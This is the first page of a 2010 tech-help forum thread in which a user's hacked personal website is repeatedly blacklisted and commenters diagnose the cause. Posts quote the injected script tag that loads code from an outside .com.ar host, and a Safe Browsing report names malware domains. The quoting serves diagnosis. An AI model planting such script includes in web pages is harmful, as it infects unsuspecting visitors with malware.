| Forum Home | ||||
| Press F1 | ||||
| Thread ID: 108750 | 2010-04-10 03:25:00 | Trouble with my personal webspace | kirkmc (15074) | Press F1 |
| Post ID | Timestamp | Content | User | ||
| 874784 | 2010-04-10 03:25:00 | Hi, wonder if any experts here can suggest a course of action. I'm part of a group of music enthusiasts and use my personal webspace at Orcon for the group to access various bits and pieces. Been doing this for several years. About a month ago, Firefox started blocking me as a 'Reported Attack Site'. I followed the procedure to fix this (which involved something to do with Google) and it went away. However it has now re-occured 5 times in the last month. The site is http://kirk.orconhosting.net.nz/ There's nothing I know of that causes this, what's there are all innocent links and some html stuff for display. I do notice strange stuff appears in my .html files that are part of the Google adware that pays for the site. Orcon tell me this stuff is OK, but if you view the source and follow some of their links you also get a 'Reported Attack Site' message. Attempts to contact Google came to nothing - I can't find a phone number or email. Firefox's website (Mozilla) show an Auckland address but this turns out to be the Lone Star bar in Newmarket. Orcon can't - or won't help. Can I do anything to stop this happening all the time, and how can I find out what's causing it? I can't believe my site is important enough to interest hackers or the like. Thanks for any suggestions. Kirk |
kirkmc (15074) | ||
| 874785 | 2010-04-10 04:02:00 | Orcon can't - or won't help . Then bump it up to more senior people at Orcon because you can't fix it from your end . |
pctek (84) | ||
| 874786 | 2010-04-10 05:54:00 | I doubt whether Orcon will be interested in looking into it - it's probably nothing to do with them at all - these things are usualy the result of your site being compromised and code added to yours somewhere. You say you "notice strange stuff appears in my .html files that are part of the Google adware" I had a quick look at your source on your 3 pages - and the first thing that makes me very suspicious is the line with a script include call after head closing and before the body open tags This is the Google ads script, which immediately follows after the body opening tag and within the div tags <body> <div> Google adds code here </div> This is not part of Google ads <script src=http://blessit.com.ar/seminarios/servicios.php ></script><body> I dont know what else you may have, as I say, was just a quick look, but that line should definately be there I think A quick google on the file name servicios.php (in the url) brings back many sites that looks like they were hacked and unknowingly hosted the same script that is being called by yours - the ones that now have ... Warning: bla bla......failed to open stream: No such file or directory and similar Also, I note that the file on blessit.com.ar is no longer there either - they were obviously informed of it/ found it recently and removed it too. Anyway, hope that helps some - if you need some more help, give me a pm and I'll do whatever I can for you |
bevy121 (117) | ||
| 874787 | 2010-04-10 05:58:00 | I tried the site and it's blocked for me, too . Did you click the 'Why was this page blocked' link? Copy and paste below, not sure if some of this info will help you track down why it's being blocked, but do any of the 3 domains listed there ring any bells? Sounds like they are the cause of your problems . . . ? Safe Browsing Diagnostic page for kirk . orconhosting . net . nz What is the current listing status for kirk . orconhosting . net . nz? Site is listed as suspicious - visiting this web site may harm your computer . Part of this site was listed for suspicious activity 2 time(s) over the past 90 days . What happened when Google visited this site? Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent . The last time Google visited this site was on 2010-04-09, and the last time suspicious content was found on this site was on 2010-04-09 . Malicious software includes 1 scripting exploit(s) . Malicious software is hosted on 3 domain(s), including aspergia-forum . de/, ville-de-lyon . fr/, maserinformatica . com . ar/ . This site was hosted on 1 network(s) including AS17746 (Orcon Internet) . Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, kirk . orconhosting . net . nz did not appear to function as an intermediary for the infection of any sites . Has this site hosted malware? No, this site has not hosted malicious software over the past 90 days . How did this happen? In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message . Next steps: * Return to the previous page . * If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools . More information about the review process is available in Google's Webmaster Help Center . |
Chikara (5139) | ||
| 874788 | 2010-04-10 06:11:00 | OOPS lol that should read "was just a quick look, but that line should definately NOT be there I think" (and my time allowed to edit had expired!) Chikara yea - thats the usual generic info... Kirk said he has already gone thru those motions a month ago and has happened 5 times more ...no, I "ignored" the block and visited the sites pages to get the info I did get Obviously, I done so in a safe environment tho! :) |
bevy121 (117) | ||
| 874789 | 2010-04-10 06:42:00 | oh and btw Chikara - those 3 domains listed are not the cause of the probs, they are places where scripts to be called were also placed I would imagine. It's the code on his own site that needs to be cleansed |
bevy121 (117) | ||
| 874790 | 2010-04-10 09:20:00 | Thanks for the feedback/comments. Agreed, the script line refering to blessit.com shouldn't be there and ok it isn't part of Google ads. I guess that 'extra stuff' and the Google ads, both being additions to my source, appeared to be somehow connected. Yes I have been down the 'Why was this site blocked?' path, replaced all the files and had normal operation resume, only to have these php scripts re-appear the very same day. How do they get there? I have reloaded index.html at about 8pm today. I'll systematically replace the rest (again!) this evening. I expect they'll be shot again tomorrow. A pity they can't be edited on line, it would be much quicker. (Or can they?) Not sure where to go from here... still looking for a reason/solution if anyone has one. BTW password was changed, to one of max strength but it made no difference. It's not just Firefox - I've also been told There is something amiss - when I try and access from IE. AVG blocks the page. Kirk |
kirkmc (15074) | ||
| 874791 | 2010-04-10 09:31:00 | It blocks it here with FF too, but it loads in IE 8 OK. And Malwarebyte's protection module doesnt block it (usually it will), if something is going on I've come across this blocking in FF twice (once with XP computers (in Newmarket), (when FF blocked it and MBAM stopped / blocked it) it was getting hacked, so I found out. It had something to do with their host. And Eden computer 10 mins walk from me here. Just the other day. But, this has now been fixed |
Speedy Gonzales (78) | ||
| 874792 | 2010-04-10 15:34:00 | For anyone interested, I replaced/cleaned all web files between 8-10pm sat night and now at 2:20 am Sunday I see "<script src=http://blessit.com.ar/seminarios/servicios.php ></script>" is back again in my index.html. So this time it wasn't even 24 hours ! In the meantime via 'Webmaster Tools', Google had cleared my site, but I expect it'll be blacklisted again very soon. Surely someone can explain what's going on ??? Why can't Orcon stop this happening? They must be letting *whoever* into my files to add this script code into my stuff. Pain in the *****, that's for sure ! Kirk |
kirkmc (15074) | ||
| 874793 | 2010-04-10 15:44:00 | You did change your passwords, didn't you? | fred_fish (15241) | ||
| 1 2 3 4 | |||||